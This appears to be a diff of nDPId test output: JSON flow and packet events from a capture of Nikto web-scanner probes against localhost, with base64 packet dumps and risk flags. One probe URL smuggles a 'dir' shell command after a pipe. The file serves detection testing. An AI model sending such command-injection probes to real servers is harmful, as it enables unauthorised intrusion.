{"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
